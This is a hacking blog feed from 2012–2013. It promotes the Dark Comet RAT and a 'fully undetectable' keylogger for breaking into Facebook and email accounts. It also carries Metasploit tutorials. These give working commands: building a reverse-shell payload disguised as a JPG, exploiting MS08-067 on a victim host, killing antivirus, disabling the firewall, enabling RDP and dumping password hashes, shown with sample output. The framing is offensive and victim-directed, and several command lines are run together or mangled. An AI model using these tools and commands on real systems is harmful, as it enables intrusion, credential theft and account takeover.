Wednesday, 16 January 2013
Dark Comet RAT v5.1 With Full Tutorial
Dark Comet RAT v5.1 With Full Tutorial
Posted by
Unknown
at
13:26
0
comments
Labels: Email Hacking, Facebook Hacking, Pc Hacking
Monday, 14 January 2013
Ardamax Keylogger (V3.8.5)Full Version - Free Download ( FUD Keylogger )
Ardamax Keylogger (V3.8.5) Full Version - Free Download
Keylogger Features:
Posted by
M
at
23:25
0
comments
Labels: Email Hacking, keylogger, Pc Hacking
How to Hack Facebook id use family key keyloger
How KeyLoggers Works And How To Use It.
Here I explain all possible information that you need to know about keyloggers which includes how to use it, how it works etc.
Posted by
Unknown
at
22:16
0
comments
Labels: Email Hacking, keyloggers, Pc Hacking
Tuesday, 31 July 2012
Nessus With Metasploit Tutorial- Backtrack 5 Video Tutorial
Nessus Metasploit On Backtrack 5
Posted by
Unknown
at
08:56
0
comments
Labels: BackTrack, Metasploit, Pc Hacking
Metasploit Tutorials From Beginner to Advance
Metasploit- An Introduction
Armitage - Cyber Attack Management
Integrate Nessus With Metasploit- Tutorial
How To Use Armitage In Backtrack 5- Tutorial
Fast Track Hacking-Backtrack5 Tutorial
Metasploit 4 Advance Penetration Testing Tool
Karmetasploit- Backtrack 5 Tutorial
Social Engineering toolkit Tutorial-Backtrack 5
Metasploit Autopwn With Nessus Backtrack 5 Tutorial
Autopwn Metasploit Backtrack 5- Postgresql Solved
Metasploit Remote Desktop Exploit-Backtrack 5
Nexpose Vulnerability Scanner Tutorial- Linux Backtrack
Nessus With Metasploit Tutorial- Backtrack 5 Video Tutorial
Posted by
Unknown
at
08:55
0
comments
Labels: BackTrack, Metasploit, Pc Hacking
Metasploit Basic Command Tutorial
root@bt:~# msfconsole
root@bt:~# msfgui
root@bt:~# msfconsole -h
msf > help
msf > connect -s www.metasploit.com 443[*] Connected to www.metasploit.com:443GET / HTTP/1.0
msf > ping 192.168.1.45
msf > show exploits
msf > show payloads
Msf>info <exploit>msf>info <payload>
msf > use exploit/windows/smb/ms08_067_netapimsf exploit(ms08_067_netapi) >
Posted by
Unknown
at
08:53
0
comments
Labels: BackTrack, Metasploit, Pc Hacking
Buffer Overflow Attack Tutorial - Backtrack 5
Requirements
- Backtrack 5 or Backtrack 5 R1 (Attacker)
- Windows (Victim)
- Mestaploit
- Apache
- Brain
Posted by
Unknown
at
08:52
0
comments
Labels: BackTrack, Metasploit, Pc Hacking
Armitage and Metasploit Video Tutorial – Hacking Training
Introduction
Metasploit
Access
Post-Exploitation
Maneuver
Team Tactics
Posted by
Unknown
at
08:51
0
comments
Labels: BackTrack, Metasploit, Pc Hacking
Metasploit Meterpreter Scripting Backtrack 5 Tutorial
A meterpreter session can be established after successfully exploiting the host. Available meterpreter scripts on a metasploit database automate multiple processes, such as:
- Capture the screen
- Keylogging
- File transfer
- Service detection and more
- Written in Ruby programming language
- Located in the metasploit directory
- Meterpreter scripts are creating everyday by different authors click here to check the list.
- Meterpreter scripts are very helpful to automate the process after compromising the host
- Meterpreter scripts are based on API and you can get more information here.
- Always use description so that the others will understand it
- Use local variable not global variable
- Always provide help option for better usage
- Keep in mind the target host (operating system, service pack (if windows), Kernel (for Unix) ) while creating a script, because all the system’s software does not contain all types of vulnerabilities
root@bt:~/Desktop# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2
LPORT=4444 Desktop > test.jpg
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {"LHOST"=>"192.168.1.2", "LPORT"=>"4444"}
root@bt:/pentest/exploits/framework3# touch a.rb
root@bt:/pentest/exploits/framework3# echo msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.1.2 LPORT=4444 Desktop > test.jpg
root@bt:/pentest/exploits/framework3# ruby a.rb
root@bt:/pentest/exploits/framework3#
The result is the same. It is also possible to create a jpg file but that method is fast. Since the time-consuming method is repeating the same step, why not create a script for that to do all these jobs automatically? There are different meterpreter scripts are available; just look at the picture below.
root@bt:/pentest/exploits/framework3# touch test.rc
root@bt:/pentest/exploits/framework3# echo use exploit/windows/smb/ms08_067_netapi
use exploit/windows/smb/ms08_067_netapi
root@bt:/pentest/exploits/framework3# echo set RHOST 192.168.1.6
set RHOST 192.168.1.6
root@bt:/pentest/exploits/framework3# echo exploit
exploit
root@bt:/pentest/exploits/framework3# msfconsole -r test.rc
- The exploit for this case (well I have used nessus before that is why I know the system is vulnerable to ms08-067-netapi bug)
- We need to set the remote host manually
- We need to set local host and port manually
Screenspy Script
KillAv Script
meterpreter > run killav
[*] Killing Antivirus services on the target...
meterpreter >
Killav contains the information on most of the better known anti-virus’s, but if there is a new anti-virus, then you will need to edit this script for the best performance. As before with the script file, we can find the famous anti-virus exe name:
- winppr32.exe
- winrecon.exe
- winservn.exe
- winssk32.exe
- winstart.exe
- winstart001.exe
- wintsk32.exe
- winupdate.exe
- wkufind.exe
- wnad.exe
- wnt.exe
- wradmin.exe
- wrctrl.exe
- wsbgate.exe
- wupdater.exe
- wupdt.exe
- wyvernworksfirewall.exe
- xpf202en.exe
- zapro.exe
- zapsetup3001.exe
- zatutor.exe
- zonalm2601.exe
- zonealarm.exe
Getcountermeasure Script
meterpreter > run getcountermeasure -h
Getcountermeasure -- List (or optionally, kill) HIPS and AV
processes, show XP firewall rules, and display DEP and UAC
policies
OPTIONS:
-d Disable built in Firewall
-h Help menu.
-k Kill any AV, HIPS and Third Party Firewall process found.
Just imagine how powerful this script is! It has an ability to fight against Firewall, Anti-virus, IPS and even third party firewall that are so very common nowadays. It is really better than Killav. To use it:
meterpreter > run getcountermeasure -d
[*] Running Getcountermeasure on the target...
[*] Checking for contermeasures...
[*] Getting Windows Built in Firewall configuration...
[*]
[*] Domain profile configuration:
[*] -------------------------------------------------------------------
[*] Operational mode = Enable
[*] Exception mode = Enable
[*]
[*] Standard profile configuration (current):
[*] -------------------------------------------------------------------
[*] Operational mode = Disable
[*] Exception mode = Enable
[*]
[*] Local Area Connection firewall configuration:
[*] -------------------------------------------------------------------
[*] Operational mode = Enable
[*]
[*] Disabling Built in Firewall.....
[*] Checking DEP Support Policy...
Gettelnet script
meterpreter > gettelnet -h
There are a lot of different scripts are available but here we will discuss only the most important ones. These will help you to understand the network as well as help you for future connections:
- Domain Name for DNS Forward Lookup
- To Perform DNS Forward Lookup on host list and domain
- The target address range or CIDR identifier
- To Perform DNS lookup of MX and NS records for a domain
- To Perform Service Record DNS lookup for a domain
- To Perform Ping Sweep on IP Range
Checkvm- Check Virtual Machine
meterpreter > run checkvm
[*] Checking if target is a Virtual Machine .....
[*] This is a Sun VirtualBox Virtual Machine
meterpreter >
Virus Scan Bypass
meterpreter > run virusscan_bypass -h
Enable RDP- Getgui
meterpreter > run getgui -e
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Enabling Remote Desktop
[*] RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
Hashdump
meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 374d90e7c3ff37a0d6064c461200ca22...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:d298b9b7042eb51df888799802d50eee:fbd49eecf08b5a011f32c57a953b5a99:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:26b787a3004f92dd4d94d34db9863999:::
If you have some other wonderful scripts, please share with in the comments!
Posted by
Unknown
at
08:44
0
comments
Labels: BackTrack, Metasploit, Pc Hacking







